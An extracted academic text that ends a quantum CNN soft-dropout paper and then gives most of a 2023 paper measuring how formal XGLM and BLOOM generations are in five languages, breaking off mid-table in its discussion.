0.9794 & 0.9447 & 0.0347 \\ \hline 0.9225 & 0.8770 & 0.0455 \\ 0.9339 & 0.9039 & 0.03 \\ \hline 0.9675 & 0.9298 & 0.0377 \\ 0.9464 & 0.9374 & 0.009 \\ \hline \end{tabular} \begin{tabular}{c c c} \multicolumn{3}{c}{12 qubits} \\ \hline **Test Acc. Validation Acc.** & **Gap** \\ \hline 0.8958 & 0.8859 & 0.01 \\ 0.8996 & 0.9082 & -0.0086 \\ \hline 0.8666 & 0.8645 & 0.0021 \\ 0.8731 & 0.8793 & 0.0062 \\ \hline \end{tabular} \begin{tabular}{c c c} \multicolumn{3}{c}{16 qubits} \\ \hline **Test Acc. Validation Acc.** & **Gap** \\ \hline 0.9422 & 0.9257 & 0.0165 \\ 0.9518 & 0.9586 & -0.0068 \\ \hline 0.8972 & 0.8895 & 0.0077 \\ 0.9127 & 0.9233 & 0.0106 \\ \hline \end{tabular} \end{table} Table 3: **Results based on Stellar dataset.** Results have the same format as in Table 1. The results clearly indicate that soft-dropout was successful in mitigating overfitting, as indicated by higher validation accuracy and smaller gap, as compared to the results with no dropout, across all tested models. the scalability and performance of soft-dropout in larger QCNN models. As quantum hardware continues to advance, larger and more complex QCNN architectures become feasible. Evaluating the behavior and effectiveness of soft-dropout in handling larger quantum circuits will provide insights into its scalability and potential challenges in maintaining regularization benefits. By pursuing these research directions, we can advance the field of QML and enhance the practical deployment of QCNN models. Overcoming overfitting challenges is crucial for ensuring the reliability and effectiveness of QCNNs in real-world applications, unlocking their potential to make significant contributions in various domains. ###### Acknowledgements. This project was supported in part by NSF award #2210374.
2302.12299
In What Languages are Generative Language Models the Most Formal? Analyzing Formality Distribution across Languages
Multilingual generative language models (LMs) are increasingly fluent in a large variety of languages. Trained on the concatenation of corpora in multiple languages, they enable powerful transfer from high-resource languages to low-resource ones. However, it is still unknown what cultural biases are induced in the predictions of these models. In this work, we focus on one language property highly influenced by culture: formality. We analyze the formality distributions of XGLM and BLOOM's predictions, two popular generative multilingual language models, in 5 languages. We classify 1,200 generations per language as formal, informal, or incohesive and measure the impact of the prompt formality on the predictions. Overall, we observe a diversity of behaviors across the models and languages. For instance, XGLM generates informal text in Arabic and Bengali when conditioned with informal prompts, much more than BLOOM. In addition, even though both models are highly biased toward the formal style when prompted neutrally, we find that the models generate a significant amount of informal predictions even when prompted with formal text. We release with this work 6,000 annotated samples, paving the way for future work on the formality of generative multilingual LMs.
Asım Ersoy, Gerson Vizcarra, Tasmiah Tahsin Mayeesha, Benjamin Muller
2023-02-23T19:39:52Z
http://arxiv.org/abs/2302.12299v1
In What Languages are Generative Language Models the Most Formal? Analyzing Formality Distribution across Languages ###### Abstract Multilingual generative language models (LMs) are increasingly fluent in a large variety of languages. Trained on the concatenation of corpora in multiple languages, they enable powerful transfer from high-resource languages to low-resource ones. However, it is still unknown what cultural biases are induced in the predictions of these models. In this work, we focus on one language property highly influenced by culture: formality. We analyze the formality distributions of XGLM and BLOOM's predictions, two popular generative multilingual language models, in 5 languages. We classify 1,200 generations per language as formal, informal, or incohesive and measure the impact of the prompt formality on the predictions. Overall, we observe a diversity of behaviors across the models and languages. For instance, XGLM generates informal text in Arabic and Bengali when conditioned with informal prompts, much more than BLOOM. In addition, even though both models are highly biased toward the formal style when prompted neutrally, we find that the models generate a significant amount of informal predictions even when prompted with formal text. We release with this work 6,000 annotated samples, paving the way for future work on the formality of generative multilingual LMs. ## 1 Introduction Natural Language Processing (NLP) systems are used worldwide across multiple cultures, audiences, contexts, communication goals, demographics, and languages. Thus it is essential that these models be able to adapt to the sociocultural context of its users. As described by Hershcovich et al. (2022), linguistic style is one of the major dimensions by which cultures vary in NLP technologies. In this work, we focus on formality. Formality is a stylistic property of language that can impact how we perceive a text. It typically carries information about the culture of the speaker (or writer), is constrained by the context of the message, and can impact the communicative goal of a text (Heylighen and Dewaele, 1999). Generating text with a desired level of formality can be useful for different NLP applications (Hovy and Yang, 2021). For example, controlling the tone of machine translation models (Sennrich et al., 2016; Niu et al., 2017; Feely et al., 2019), designing chatbots with formality awareness to respond to user-preferred conversational style (Cox and Ooi, 2022), or assisting users to change the formality level of their writings (Rao and Tetreault, 2018; Wang et al., 2019, 2020). Generative language models have demonstrated capabilities in producing cohesive texts and solving NLP tasks with zero/few-shot learning (Radford et al., 2019; Brown et al., 2020; Chowdhery et al., 2022; Zhang et al., 2022), even in multilingual scenarios (Lin et al., 2021; Scao et al., 2022; Barbieri et al., 2022; Jiang et al., 2022). Multilingual language models are trained with large amounts of text from different sources. That training process could make the model biased towards a certain level of formality because of the data of each language as well as cross-lingual transfer (Pires et al., 2019; Libovicky et al., 2020; Muller et al., 2021), limiting the capabilities of the model to adapt to different cultures of an NLP application. This work analyzes the formality level of two multilingual language models: XGLM (Lin et al., 2021) and BLOOM (Scao et al., 2022), across five languages, namely Arabic, Bengali, English, French, and Spanish. To do so, a native/proficient speaker of each language evaluates the generation outputs of each model into three categories: formal, informal, and incohesive. This evaluation allows us to analyze the generations across three different dimensions: the cohesiveness of the generations,1 the formality bias given neutral prompts, and the formality preservation given formal/informal prompts. As an example, we show in Table 1 the predictions of BLOOM and XGLM conditioned on the same prompt in Bengali but generating text of different formality level. Overall, our contributions are the following: * To the best of our knowledge, this is the first work to analyze the formality of generative multilingual language models across multiple languages. While we have focused on specific models and languages in this work, the procedures followed to define formality, prompt sourcing, language generation, and measurement of how formality is preserved from prompts are generalizable to any generative system and language. We open-source 1,200 generations, per language, manually annotated as formal, informal, or incohesive 2. Footnote 2: [https://github.com/asimokby/formality-bias-analysis](https://github.com/asimokby/formality-bias-analysis) * We find that BLOOM generates about twice longer texts as XGLM. Besides, almost all the generated formal sentences are longer than the informal ones. Also, informal generations in English, French, and Spanish are characterized by being more conversational, and in Bengali, by having more punctuation marks. * We find that BLOOM is significantly more cohesive than XGLM in English, French, and Spanish and performs similarly in other languages. * Both XGLM and BLOOM are generally biased toward formal text when prompted in a neutral way. However, both models are very sensitive to the formality of the prompt and will generate informal text if conditioned with informal prompt. This is particularly striking for Arabic: BLOOM generates dialectal Arabic (considered informal) when prompted with informal text while being extremely biased toward Modern-Standard Arabic (considered formal). ## 2 Formality Across Different Languages We start by defining formality in the five languages in our study. ArabicThe Arabic language is spoken in many dialects Watson (2011). These dialects are variants of classical or standard Arabic, which has a modernized version of it called Modern Standard Arabic (MSA). Badawi (1973), in his famous book _Mustawayat Al-arabiyya Al-muasira Fi Misr_ (_The levels of contemporary Arabic in Egypt_), presents a theory on the relationship between standard Arabic (_Fusha_) and vernacular Arabic (_Anmiya_) in Egypt. His theory describes the situation as a continuum with 5 major divisions: illiterate colloquial Arabic, educated colloquial Arabic, elevated colloquial Arabic, modern standard Arabic, and classical Arabic. The first three divisions are _Anmiya_, which is considered informal and not necessarily grammatically correct. The last two divisions are _Fusha_, which is considered formal. However, the definition of what is formal and what is informal could depend on the problem at hand, for example, in one case, elevated colloquial Arabic could be considered formal while illiterate colloquial Arabic as informal. In our work, we define formality for Arabic as follows: a piece of text is formal if it contains no words coming from any Arabic dialect which is not considered as _Fusha_, following (Badawi, 1973)'s definition of _Fusha_. For example, the following sentence: younger, children or very close friends. The third person _he / she_ can be translated to /Tini (formal) vs /Se (informal) which encodes two levels of formality- honorific and non-honorific. Bengali Pronouns can encode numbers such as singular/plural, but the notion of formality is not changed by gender or numerical properties (David, 2015). The following are other considerations of formality in Bengali : * Texts containing a high frequency of Sanskrit-originated words can be considered formal. Agglutination/Compound words can be considered more formal compared to their analytical or elaborated forms. (formal) /Tini (informal) -- _death_ has same meaning, but a different formality (Panda, 1992; Nagarajan, 2014; Ghosh et al., 2022). * Bengali pronouns agree with the verb in levels of formality and there are formal and informal variations of the same verb. (David, 2015; Sultana, 2016) For instance, verbs like _Give_, _Eat_, _Go_ can be written as (formal) or (formal) depending on the context. * Bengali does not contain any negative pronoun or adverb and sentences can be modified to be negative at a syntactic level by adding or other modifiers. These negation modifiers like _na/nei/nai/Ni_ can indicate variations in formality (Thompson, 2006). * Among Bengali speakers in Bangladesh, regional dialects like Sylheti, Chakma, and Chittagonian are generally considered deviant or informal while classical Bengali dialect (Sadhubhasa) or standardized Bengali dialect (Cholito vasha) is considered formal (Ray et al., 1966). EnglishFormality in English is commonly defined as the style of language used in a given situation. A formal speech, for instance, has a very careful selection of pronunciation, words, and structure (Richards and Schmidt, 2013). Heylighen and Dewaele (1999) divide English formality into two dimensions: a _deep formality_, characterized by the understanding of the precise meaning, avoiding ambiguity; and a _surface formality_ which focuses on the rigorous selection of manners. Some recent works focus on the latter to evaluate formality using the selection of words (Brooke et al., 2010) and discarding the topic (Pavlick and Tetreault, 2016). In accordance with Liardet et al. (2019), we use the following rules to evaluate cohesive English text as informal: * Presence of contractions, abbreviations, and colloquial expressions. * Presence of grammar infelicities, that is, unsuitable expressions, inconsistencies in writing, and misspellings. * High occurrence of delexical verbs and phrasal verbs. \begin{table} \begin{tabular}{p{113.8pt} p{113.8pt} p{113.8pt}} \hline \hline \multirow{2}{*}{**Prompt**} & \multicolumn{2}{c}{**Generation**} \\ \cline{2-3} & **XGLM(7.5B)** & **BLOOM(7.1)** \\ \hline \multirow{2}{*}{_Not being able to cry is also very difficult_} & _But people of our hopes and dreams change so much! There could not be a greater example...!_ & _But Anju Ghosh was the one who broke down in tears, her daughter said. Anju Ghosh returned to work after spending time with her daughter Afzal Hosain, a veteran actor and theater personality of the country, died at Tongi Government Hospital last Thursday around 9 pm._ \\ \hline \hline \end{tabular} \end{table} Table 1: XGLM (Lin et al., 2021) and BLOOM (Scao et al., 2022) generating predictions of different formality (informal in red and formal in green) based on a Bengali formal prompt sampled from the InFormal dataset (Krishna et al., 2022). As illustrated here, the formality of the predictions differ between XGLM and BLOOM. * Higher involvement of human participants and subjective judgments, such as opinions. FrenchFormality is typically classified in French into three classes: _soutenu_, _covarant_ and _familiar_Gadet (2005); Beeching et al. (2009). The register _soutenu_ is reserved for legal documents, literature, or when addressing someone we want to show particular respect (e.g., a judge). It usually involves addressing someone with the second singular person (called _vousvoment_). The register _covarant_ corresponds to the one used in day-to-day life, for instance when we talk to someone new which is typically neutral and includes few grammatical errors. The register _familiar_ is the one used with friends, or within a family circle. It usually involves addressing someone with the second singular person tu (_tutoiment_). It can include a large portion of grammatical errors. It can also include slang and insults in their most vulgar form. In this work, following what was done in the XFORMAL work Briakou et al. (2021), we classify generated text into two classes. Soutenu is associated with the formal class while _familiar_ and _covarant_ with the informal class. SpanishFormality in Spanish is commonly described by the T-V distinctions in the singular second-person pronoun derived from Latin. Specifically, there are two possible translations for the English pronoun "**you**": \(\mathbf{t}\mathbf{\dot{u}}\) is considered informal while _usted_ is formal. Both pronouns have different conjugations. Thus, the formality in sentences that use the singular second person is easily recognizable. In the case of the other pronouns, the first person is often considered less polite than the third one Stewart (2001). For that reason, the third person is commonly used in scientific texts Salazar et al. (2013). Aside from the pronouns and their conjugations, according to Cepeda and Tavera (2007), a formal text in Spanish should accomplish other characteristics such as: * Having no typographical or grammatical errors. * Being a set of sentences referring to the same topic. * Being arranged in paragraphs and having a coherent correlation between ideas using appropriate connectors. In our work, we check the presence of slang or offensive terms in a sequence to classify text as informal. Then, T/V distinction in sentences written using the second person defines the formality level. In a similar way, sentences written in the third person have a bigger probability of being classified as formal compared to the ones written in the first person. The final priority is the layout: paragraph-structured sequences are considered as formal in more scenarios than conversational-structured ones. ## 3 Related Work Biases of Generative Language ModelsRecent literature on Large Language Models (LLMs) demonstrated social bias and prejudice against minorities Sheng et al. (2021); Blodgett et al. (2020); Bender et al. (2021); Bommasani et al. (2021); Liang et al. (2021) in terms of many categories including gender Sun et al. (2019); Cao and Daume III (2020); Felkner et al. (2022), race Davidson et al. (2019), religion Abid et al. (2021); Malik et al. (2022), occupation, politics and disabilities which result in the production of damaging content. Evaluating social bias and harm produced by monolingual language models is hard, but difficulties increase in multilingual settings. To create multilingual evaluation frameworks, it has been argued that careful curation of culturally aware datasets and knowledge of cultural differences that exist between languages is necessary Talat et al. (2022). Many papers have focused on measuring social biases and stereotypes against historically disadvantaged groups and counteracting them for a limited number of languages like English Nadeem et al. (2021); Nangia et al. (2020); Barikeri et al. (2021), French Neveol et al. (2022), Hindi Malik et al. (2022), but similar work has not been done for low-resource languages like Bengali. Since LLMs such as BLOOM Scao et al. (2022) can be continuously (re)trained and are deployed by companies to be accessible by users, proposals have been made to create social bias verification pipelines for LLMs similar to software testing Nozza et al. (2022). To our knowledge, the evaluation of multilingual models for measuring cultural biases like formality has not been attempted so far. Formality AnalysisPrevious work in formality analysis has focused on formality classification Heylighen and Dewaele (1999); Abu Sheikha and Inkpen (2010); Pavlick and Tetreault (2016); Demen tieva et al., 2022), formality style transfer in English (Rao and Tetreault, 2018; Wang et al., 2019, 2020; Czeresnia Etinger and Black, 2019; Madaan et al., 2020; Yao and Yu, 2021; Briakou et al., 2021), and in the multilingual setting (Korotkova et al., 2019; Briakou et al., 2021; Krishna et al., 2022). Formality-sensitive machine translation to control the generation of machine translation models to target formality has received attention in recent years (Sennrich et al., 2016; Niu et al., 2017; Feely et al., 2019; Viswanathan et al., 2020; Niu and Carpuat, 2020; Schioppa et al., 2021) and benchmark MT datasets and models have been published (Nadejde et al., 2022; Rippeth et al., 2022). Recently, several datasets with formality annotations have been introduced in multiple languages. Initial attempts included annotating sentences from various resources such as emails, news, online forums, and blog sentences with numerical formality rating (Lahiri, 2015; Pavlick and Tetreault, 2016). The Grammarly's Yahoo Answers Formality Corpus (GYAFC) (Rao and Tetreault, 2018) is a benchmark formality style transfer dataset for English. XFORMAL (Briakou et al., 2021) extended formality style transfer to the multilingual setting by collecting data for four European languages (Brazilian, Portuguese, French, and Italian). InFormal (Inflic Formality Evaluation Dataset) (Krishna et al., 2022) is a small dataset of 4k samples in four Indic languages - Hindi, Bengali, Kannada, Telugu with crowdsourced formality annotations. TAOCD (The Arabic Online Commentary Dataset) (Zaidan and Callison-Burch, 2011) presents an annotated dataset of informal Arabic with high dialectal content with 108k labeled sentences. In our work, we use GYAFC (English), XFORMAL (French), TAOCD (Arabic), and InFormal (Bengali) to source prompts for our analysis of language models along with other resources described in table 2. In the following sections, we describe our experiments and results for different languages. ## 4 Experiments We evaluate different dimensions of formality of the generation outputs of two state-of-the-art generative multilingual language models: XGLM (Lin et al., 2021) and BLOOM (Scao et al., 2022), in five languages: Arabic, Bengali, English, Spanish, and French. We hypothesize that the influence of high-resource languages in the corpus can involve biases in the formality of the whole models. To see their behavior in different scenarios, we employ distinct variations of prompt lengths and formality. In addition, we tweak some parameters when generating to avoid incohesive outputs. ### Language Models Xglm(Lin et al., 2021) is a multilingual generative language model based on a decoder transformer. XGLM is trained with 500 billion tokens belonging to 30 languages. XGLM aims to achieve multilingual zero-shot and few-shot learning performance for different tasks. To do so, their authors propose multilingual prompting to improve the results of single-language prompts. XGLM has five sizes according to their number of parameters ranging from 564 million to 7.5 billion parameters. We employ the models with 2.9 and 7.5 billion parameters for this study3. Footnote 3: We use the checkpoints and implementations from [https://huggingface.co/models](https://huggingface.co/models) Bloom(Scao et al., 2022) is also a multilingual generative language model trained on around 341 billion tokens from a corpus of 59 languages (13 of them are programming ones) to democratize huge pre-trained language models. BLOOM was trained from a collection of multiple sources such as Huggingface datasets, Github code, and Web Common Crawl. The data sources were then preprocessed to reduce non-natural language and anonymize personal identifiable information. BLOOM used architectural improvement introduced with the Megatron-LM GPT2 (Shoeybi et al., 2019), such as a normalization layer after the embeddings, ALiBi positional embeddings (Press et al., 2021), and a Byte-Level Byte Pair Encoding (Radford et al., 2019). BLOOM was released in different sizes ranging from 560 million to 176 billion parameters. We use the 3B and 7.1B parameter checkpoints\({}^{2}\) for our experiments as they can be compared to XGLM ones. XLGM and BLOOM are decoder-based transformers pre-trained on a similar set of languages with a comparable amount of data. We compare checkpoints of similar scale (i.e. we compare XGLM 2.9B with BLOOM 3B and XGLM 7.5B and BLOOM 7.1B). Regarding the proportion and data sources on which both models were trained, BLOOM was trained on a more varied set of domains than XGLM in spite of the XGLM corpus being larger. In addition, the BLOOM corpus has a more balanced distribution of the amount of data of the languages evaluated in this study. More details about the quantity and sources of both models can be found in Appendix C. ### Prompting for Formality Evaluation We employ two prompting strategies to condition the generation of the models. In that way, the behavior of the model in different scenarios can be assessed. Short Neutral PromptsA short prompt is composed of up to three words to condition the language of the output without giving any context that could impact the formality level. That allows us to measure the models' tendency to produce a certain formality level with a neutral input. For the lexicon of each language4, we pick a set of common words (or a combination of them to avoid the confusion of languages when generating) that can be used in both formal and informal sentences. We illustrate the short prompt we use in Table 2. Footnote 4: [http://corpus.rae.es/lfrecuencias.html](http://corpus.rae.es/lfrecuencias.html), [https://www.pinhok.com/kb/bengali/98/100-basic-bengali-vocabularies/](https://www.pinhok.com/kb/bengali/98/100-basic-bengali-vocabularies/), [https://talkinarabic.com/arabic-words/](https://talkinarabic.com/arabic-words/), [https://en.wikipedia.org/wiki/Most_common_words_in_English](https://en.wikipedia.org/wiki/Most_common_words_in_English) [https://stromenninc.com/1000-most-common-french-words-frequency-vocabulary/](https://stromenninc.com/1000-most-common-french-words-frequency-vocabulary/) Long Informal/Formal PromptsThis set of prompts is composed of truncated sentences extracted from existing formal/informal sources. Using these prompts, we can verify how much the models preserve the formality level of their input. The sources of the prompts include formality datasets such as GYAFC Rao and Tetreault (2018), XFORMAL Briakou et al. (2021), InFormal Krishna et al. (2022). We also include dataset crawlings from webs Zaidan and Callison-Burch (2011); Canete (2019) and informal songs Munoz (2018). Table 2 details which words/group of words we use as short prompts and the dataset sources of the formal/informal prompts for each language. ### Generation Parameters Decoding parameters are important because they can affect the output of a language model directly. For each language, we select a set of parameters to produce fluent text that can be evaluated properly. All selections were chosen to impact the natural formality level of models as less as possible. This subsection presents our list of generation parameters to reproduce our experiments. Global generation parametersOur evaluation of the models is based on the formality of the outputs of each model. Very short sentences, code snippets, and outputs in other languages cannot be evaluated properly. This set of parameters is a collection of language-independent configurations to produce an assessable amount of outputs with a significant length to be evaluated. 1. We filter out the generation sequences that are not natural language (i.e., code) by excluding from the generation process all the tokens that contain any of the following symbols: {, }, (, ), [, ], \(\backslash\), \(<\), \(>\), \(|\), and \(;\backslash n\). 2. We force the model to generate at least 30 new subword tokens (excluding the prompt) to have a long enough generation sequence and be able to assess formality. \begin{table} \begin{tabular}{c c c c} \hline \hline & **Neutral\({}^{+}\)** & **Formala\({}^{\bullet}\)** & **Informal\({}^{\bullet}\)** \\ \hline **ar** & _(WhenThen), \({}_{\blacksquare}\)_ & TAOCD & TAOCD \\ & _(Yes), \({}_{\blacksquare}\)_ & _(There)_, & (Zaidan & (Zaidan \\ & _(Unless), \({}_{\blacksquare}\)_ & and & and \\ & _(If), \({}_{\blacksquare}\)_ & _(From), \({}_{\blacksquare}\)_ & Callison- \\ & _(At/When), \({}_{\blacksquare}\)_ & _(I)_ & Burch, \\ & _(No)_ & & 2011) \\ **bn** & _(I), \({}_{\blacksquare}\)_ & InFormal & InFormal + \\ & _(His/Her), \({}_{\blacksquare}\)_ & _(If)_, & (Krishna & Microblog \\ & _(It), \({}_{\blacksquare}\)_ & _(What), \({}_{\blacksquare}\)_ & _(What), \({}_{\blacksquare}\)_ & dataset \\ & _(Why), \({}_{\blacksquare}\)_ & _(Of)_ & _(2022)_ & _(Chowd-_ \\ & _(He/She), \({}_{\blacksquare}\)_ & _(OR)_, & _(R)_ & _(Chowd-_ \\ & _(They)_ & & & \\ & _(But), \({}_{\blacksquare}\)_ & _(R)_ & & \\ & _(They)_ & & & \\ **en** & _The, I, This, He, She, You, They, We, Do, There_ & GYAFC & GYAFC \\ & _You, They, We, Do, There_ & (Rao and & Rao and \\ **fr** & C’est _(It is), Is _(They)_, & XFORMAL \\ & Elles _(They), II _(He),_ & XFORMAL \\ & elle _(She),_ & ce _(This)_, & Est-ce que _(question)_, & _(Briakou et al., 2021b)_ & _(Briakou et al., 2021b)_ \\ & Ca _(That),_ & Ce _(This)_, & Deux (Two)_ & Wikipedia & _9322 rap \\ **es** & Por la _(For the),_ & _(The),_ & _(Canete, 2019)_ & _(Canete, 2019)_ \\ & el _(For the),_ & Con unos & _(With some),_ & _(filtered)_ \\ & la _(Why the),_ & _(She)_ & _(It_ & \\ & _(And),_ & Por su _(Becausse & 2018)_ \\ & _of),_ & Para un _(For a)_, & De una _(Of a)_ & \\ \hline \hline \end{tabular} \end{table} Table 2: Prompts used in our experiments. \({}^{+}\)List of the short prompts across the 5 languages. 10 prompts per language are used with 10 generation sampled for each prompt. *Sources of the formal/informal prompts. 100 prompts per language are sampled from these datasets. 3. We set a maximum of 150 new tokens of generation to avoid long outputs that could include multiple formality variations. 4. Length of the prompts. For the short-prompt setting, we employ at most three tokens to condition the generation in the desired language. For the formal/informal prompts, we use 15 words (tokenization with white spaces) on average. Regarding the total number of evaluated outputs, we generated three sets for each evaluated model and language: 100 with short, 100 with formal, and 100 with informal prompts. That resulted in 1200 generated outputs for each language. Language-specific generation parametersBefore generating the sequences for formality evaluation, we tweaked some logit parameters for each language. All modifications were done to obtain more fluent sequences and reduce incohesive outputs such as ones with generation repetitions or non-understandable text. This process was done with a varied set of prompts regardless of length and formality level. We use sampling to obtain the generation outputs for both models. Three specific parameters were set for both models: We set **top-k** to 50, which truncates the number of tokens to sample from. We set a high **top-p**Holtzman et al. (2019) to generate diverse sampled tokens by cumulative frequency, and a high **temperature**Ackley et al. (1985), which does not skew the distribution towards high probability tokens. The specific details of the parameters can be found in Appendix 6. ### Formality Evaluation We assessed the formality of all generated outputs. To do so, one native/proficient speaker of each language classified all 1200 generated sequences individually. We opted for this evaluation procedure because, at the time of performing the experiments, to our knowledge, there were no multilingual formality classifier models that include Arabic, Bengali, English, Spanish, and French. To avoid possible biases, each generated output was annotated without looking at its prompt and in a randomized order. The classification categories for all languages are **formal, informal**, and **incohesive**. A sequence is classified as formal or informal according to the rules of each language described in section 2. The "Incohesive" label is only assigned under certain conditions, such as sequences written in other languages, non-understandable text, very short sequences that cannot be evaluated for formality level, or code snippets. ## 5 Results & Analysis We interpret our results across different dimensions. We start by analyzing the cohesiveness of each model. We then exclude the incohesive text from our formality analysis. ### Cohesiveness of Generation As seen in Table 3, BLOOM(7.1B) generates significantly more cohesive texts than XGLM(7.5B) for English, French, and Spanish with p-values under 5%, based on a permutation-based statistical test. Interestingly, the results in Table 3 also show that a larger model does not necessarily lead to more cohesive generations. For example, BLOOM(3B) generates more cohesive texts than BLOOM(7.1B) for Bengali and English. XGLM(2.9B) also generates more cohesive texts than XGLM(7.5B) for English, French, and Spanish. We note that we are only evaluating cohesiveness in a binary way (cohesive vs. incohesive) and are not judging the quality of the predictions beyond that. Besides, the percentage of incohesive texts is noticeably higher for some languages than others for both BLOOM and XGLM. For example, the highest percentage of incohesive texts in the case of Bengali, English, and Spanish is less than or equal to 10%, while that percentage is higher in the case of Arabic and French. ### Formality-Level Bias Neutral prompts, given to an assumingly unbiased model, should lead to equitable distributions of \begin{table} \begin{tabular}{c c c c c c} \hline \hline **Model/Language** & **Arabic** & **Bengali** & **English** & **French** & **Spanish** \\ \hline XGLM(2.9B) & 9.3\% & 8.0\% & 6.7\% & 16.0\% & 6.7\% \\ BLOOM(3B) & 13.3\% & 4.3\% & 3.3\% & 12.0\% & 3.3\% \\ \hline XGLM(7.5B) & 8.7\% & 5.0\% & 10.0\% & 18.0\% & 7.7\% \\ BLOOM(7.1B) & 12.3\% & 6.3\% & **3.7\%* & **8.7\%* & **2.7\%* \\ \hline \hline \end{tabular} \end{table} Table 3: Percentages of the incohesive samples out of the 1200 generated samples per language (300 samples per model). Percentages are averaged across prompt types: 400 neutral, 400 formal, and 400 informal prompts. Bolded values show that the corresponding model is significantly better according to a permutation-based statistical test with a p-value of 5% or less. formal and informal generations with a difference close to zero between both generations. However, this is not the case here as we show in Table 4. In the case of Bengali, we see that XGLM(2.9B), BLOOM(3B) and BLOOM(7.1B) are almost neutral with small differences of -3% -6% and -3%, respectively, showing bias toward informal generations. On the other hand, we see XGLM(7.5B), surprisingly, showing significantly more bias toward formal generations than BLOOM(7.1B) with a difference of 33%. Upon qualitative analysis, we found that many of the generations of XGLM(7.5B) had Bengali religious Islamic text-like attributes that were considered formal during annotation and the usage of hashtags or emojis was also less than the smaller model for neutral prompts. BLOOM, for French, continues to show less bias showing only a bias of 1% toward informal generations in the case of BLOOM(3B) and 14% towards formal generations in the case of BLOOM(7.1B). On the other hand, XGLM(2.9) shows significantly more bias than BLOOM(3B) toward formal generations with a difference of 41%. For English, XGLM and BLOOM both show a small bias (in terms of percentages) towards different directions. XGLM(2.9B) and XGLM(7.5B) show bias towards formal generations by 14% and 8% respectively. However, BLOOM(3B) and BLOOM(7.1B) display bias towards informal generations by 6% and 13% respectively. After a careful review of the predictions, we find that French and English informal predictions of BLOOM are due to a large proportion of informal generated dialog. BLOOM, this time for Spanish, shows extreme bias towards the formal generations with a difference of 79% for BLOOM(3B) and 67% for BLOOM(7.1B). On the other hand, XGLM exhibits less bias towards formal generations with a difference of 58% for XGLM(2.9B) and 45% for XGLM(7.5B). These values indicate that both models are influenced by formal sources. In fact, most of the generated sequences with short prompts have the style of news titles/contents and Wikipedia articles. A biased distribution of outputs could be reasoned by the data the model was trained on. As stated in BLOOM (Scao et al., 2022), the biggest part of the corpus for Arabic was the Arabic-focused Masader repository (Alyafeai et al., 2021; Altaher et al., 2022), which is dominated by Modern Standard Arabic (MSA) that is considered formal according to our definition of formality in section 2. This explains the extreme bias BLOOM(3B) and BLOOM(7.1B) show towards formal generations with a bias of 100%. XGLM(7.5B) similarly shows an extreme bias toward formal generations, but significantly less than BLOOM(7.1B) with a difference of 83%. In terms of model size, we notice that XGLM(2.9B) shows more bias towards formal or informal generations than XGLM(7.5) for all the languages except Bengali, which could indicate that the bigger the XGLM model's size, the less biased it is. On the other hand, this isn't the case for BLOOM as BLOOM(3B) is only expressing more bias for Bengali and Spanish, while BLOOM(7.1B) shows more bias for English and French. In summary, the models show moderate bias for some languages such as English and Bengali, except for XGLM(7.5B) in the case of Bengali, while also showing extreme bias for other languages such as Arabic, French, and Spanish. This difference might be caused by the fact that every language is present in the data with a different percentage and is coming from different sources as shown in Table 7. Overall, it is noticeable that the bias is mostly toward formal generations for all the models and for all the languages. ### Formality-Level Preservation In this experiment, we measure how well the formality level of a generation is the same as the formality level of the prompt (i.e. how well the model preserves the formality-level of the prompt). We find that the formality style of the prompts is preserved efficiently for some languages by some models while being almost ignored in some other cases. For Arabic, as we show in Table 5, BLOOM(3B) \begin{table} \begin{tabular}{c c c c c c} \hline \hline **Model/Language** & **Arabic** & **Bengali** & **English** & **French** & **Spanish** \\ \hline XGLM(2.9B) & 92\% & -3\% & 14\% & 41\% & 58\% \\ BLOOM(3B) & 100\% & -6\% & -6\% & **-1\%\(\ast\)\(\ast\)** & 79\% \\ \hline XGLM(7.5B) & **83\%\(\ast\)** & 33\% & 8\% & 32\% & 45\% \\ BLOOM(7.1B) & 100\% & 35\%\(\ast\) & -13\% & 14\% & 67\% \\ \hline \hline \end{tabular} \end{table} Table 4: Differences between formal and informal sample percentages of 400 samples per language (100 samples per model) sampled with neutral prompts. A green color indicates a bias toward formal generations and a pink color indicates a bias toward informal generations. Bolded values show that the corresponding model is significantly better according to a permutation-based statistical test with a p-value of 5% or less. and BLOOM(7.1B) preserve the formality style of 94.2% and 93.5%, respectively, of the samples when the given prompt is formal. However, BLOOM does not pay that much attention to the style of the informal prompts and preserves the style of only 55.1% of the samples with BLOOM(3B) and 51.1% of the samples with BLOOM(7.1B). This confirms our finding from section 5.2 that showed that BLOOM is biased toward formality in Arabic. XGLM(7.5B), on the other hand, preserves the informal style of the prompts significantly better than BLOOM(7.5B) with a percentage of 76.7%. XGLM(2.9B), for Bengali, preserves the style of the informal prompts of significantly more samples than BLOOM(3B) with a percentage of 100%. BLOOM pays attention to the informal style of the prompts as well, unlike the case for Arabic, and preserves the style of 87.1% of the samples generated with BLOOM(3B) and 91.9% of the samples generated with BLOOM(7.1B). Both BLOOM and XGLM, this time for English, do not preserve the formal style of the prompts for more than 34.4% of the samples for any model. However, they both preserve the informal style in at least 84.7% of the generated samples with BLOOM(7.1B) preserving significantly more samples than XGLM(7.5B). A similar trend follows for French with both BLOOM and XGLM unable to preserve the formal style for more than 32.0% of the samples in the case of XGLM(2.9B), BLOOM(3B) and BLOOM(7.1B). On the other hand, XGLM(7.5) preserves the formal style significantly better than BLOOM(7.1B) with a percentage of 54.0%. And again the informal style is being preserved better with, specifically, BLOOM(3B) which preserves the style better than XGLM(2.9B) with a percentage of 82%. The formal and informal styles in Spanish are preserved consistently across the models to at least 77.8% of the samples with formal prompts and at least 75.8% with informal prompts with BLOOM(7.1B) preserving the style in significantly more samples than XGLM(7.5B). In terms of model size, we notice that the size of the model is not an indicator of how well the model can preserve the formality style. For example, BLOOM(3B) preserves the formal style better than BLOOM(7.1B) for all languages except Spanish. In summary, we see that the informal style is mostly preserved well for most languages except with BLOOM for Arabic. The formal style, on the other hand, is mostly preserved well for all languages except English and French. ### General Statistics about Generations We report in Table 8 general statistics about the generated texts of each model and language by formality level. Results show that BLOOM generates about twice longer texts as XGLM. In terms of the average number of sentences per generation, BLOOM, when the generation is informal, generates more and shorter sentences than when the generation is formal. Also, informal generations tend to have emojis as expected, especially in the case of Bengali. Besides, informal generations tend to have more punctuation marks than formal ones. Finally, the results of the average number of new lines and the average number of "-", which are used to signal dialogues, support what we mentioned earlier about BLOOM's tendency to generate conversational text. ## 6 Discussion Formality bias when present in multilingual models, which are increasingly popular nowadays, can lead to undesirable outcomes. For example, using _"please"_ is common among North American En \begin{table} \begin{tabular}{c c c c c c} \hline \hline \multirow{2}{*}{**Model/Language**} & **Arabic** & **Bengali** & **English** & 